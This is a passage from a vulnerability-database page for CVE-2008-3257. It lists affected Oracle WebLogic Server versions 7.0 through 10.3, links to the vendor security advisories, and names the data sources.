- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.0.0.0.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.1.0.0.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 9.2.0.0.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 10.3 (Open CPE detail)
References
http://www.oracle.com/technology/deploy/security/alerts/alert_cve2008-3257.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://blogs.oracle.com/security/2008/07/security_alert_for_cve-2008-3257_released.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.